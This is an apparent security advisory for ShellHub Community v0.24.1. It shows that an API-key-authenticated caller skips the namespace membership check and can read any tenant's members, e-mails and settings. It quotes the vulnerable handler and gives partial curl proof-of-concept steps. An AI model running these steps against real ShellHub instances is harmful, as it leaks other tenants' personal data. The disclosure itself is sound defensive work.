GET /api/namespaces/:tenant returns the full namespace object — including the members list (user IDs, e-mails, roles), settings, and device counts — to any caller authenticated by an API Key, for any tenant, regardless of the API Key's own tenant scope.
The handler conditionally skips the membership check when the user ID (X-ID) is absent, which is exactly the case for API Key authentication.
ShellHub Community v0.24.1 (validated).
api/routes/nsadm.go:75-102 — membership check is skipped when c.ID() is nil:
var uid string
if c.ID() != nil {
uid = c.ID().ID
}
ns, err := h.service.GetNamespace(c.Ctx(), req.Tenant)
if err != nil || ns == nil {
return c.NoContent(http.StatusNotFound)
}
if uid != "" { // ⚠️ skipped when API Key is used
if _, ok := ns.FindMember(uid); !ok {
return c.NoContent(http.StatusForbidden)
}
}
return c.JSON(http.StatusOK, ns)
AuthRequest (api/routes/auth.go:53-64) sets only X-Tenant-ID, X-Role,
and X-API-KEY for API Key authentication — never X-ID. So
c.Request().Header.Get("X-ID") returns "", c.ID() returns nil, and
the membership check is bypassed.
# Attacker authenticates in their own namespace and mints an API Key
ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"..."}' | jq -r .token)
ATTACKER_KEY=$(curl -s -X POST http://target/api/namespaces/api-key \
-H "Authorization: Bearer $ATTACKER_TOKEN" \
-H 'Content-Type: application/json' \
-d '{"name":"poc","expires_at":30}' | jq -r .id)
# Baseline: same request with JWT is correctly blocked
curl -i http://target/api/namespaces/<victim-tenant-uuid> \
-H "Authorization: Bearer $ATTACKER_TOKEN"
# Observed: HTTP 403 (correct)...
0.24.2Exploitability
AV:NAC:LPR:LUI:NScope
S:UImpact
C:HI:NA:N6.5/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N